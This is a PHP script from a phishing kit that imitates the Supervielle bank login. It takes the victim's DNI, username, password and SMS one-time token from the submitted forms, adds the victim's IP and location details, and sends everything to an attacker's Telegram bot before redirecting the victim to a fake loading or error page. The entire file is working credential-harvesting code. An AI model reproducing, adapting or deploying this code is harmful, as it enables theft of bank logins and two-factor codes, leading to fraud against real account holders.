<?php  
if (isset($_POST['submit'])) {
  include '../config/bot_id.php';
  include 'class/send-tlg.php';
  $server_ip = file_get_contents('http://ipecho.net/plain');
  $titulo_cargando = 'Verificando información';
  $ip_api_url = "http://ip-api.com/json/" . $server_ip;
  $response = file_get_contents($ip_api_url);

  $data = json_decode($response);

  if ($data && $data->status == 'success') {
    $enviara =
    " -- SUPERVIELLE personas -- \n\n".
    "<b>🌆 Ciudad: ".$data->city." </b>\n".
    "<b>🌍 Pais: ".$data->country." </b>\n\n".
    "<b>ISP: </b>  ".$data->isp."\n\n".
    "<b>🌐 IP: </b> <code>".$_SERVER['REMOTE_ADDR']."</code>\n".
    "<b>👤 DOC: </b> <code>".$_POST['dni']."</code>\n".
    "<b>👤 USER: </b> <code>".$_POST['user']."</code>\n".
    "<b>👤 PASSWORD: </b> <code>".$_POST['password']."</code>\n\n";

    $enviar =  urldecode($enviara);

  }
  $envio = new sendTlg();
  $envio->setTlgData($CHAT_ID,$API_TOKEN, $enviar);
  header('location:loading.html');
}


if (isset($_POST['submit2'])) {
  include '../config/bot_id.php';
  include 'class/send-tlg.php';
  $server_ip = file_get_contents('http://ipecho.net/plain');
  $titulo_cargando = 'Verificando información';
  $ip_api_url = "http://ip-api.com/json/" . $server_ip;
  $response = file_get_contents($ip_api_url);

  $data = json_decode($response);

  if ($data && $data->status == 'success') {
    $enviara =
    " -- SUPERVIELLE token -- \n\n".
    "<b>🌆 Ciudad: ".$data->city." </b>\n".
    "<b>🌍 Pais: ".$data->country." </b>\n\n".
    "<b>ISP: </b>  ".$data->isp."\n\n".
    "<b>🌐 IP: </b> <code>".$_SERVER['REMOTE_ADDR']."</code>\n".
    "<b>👤 token: </b> <code>".$_POST['sms']."</code>\n\n";

    $enviar =  urldecode($enviara);

  }
  $envio = new sendTlg();
  $envio->setTlgData($CHAT_ID,$API_TOKEN, $enviar);
  header('location:valid.php?error=1');
}
?>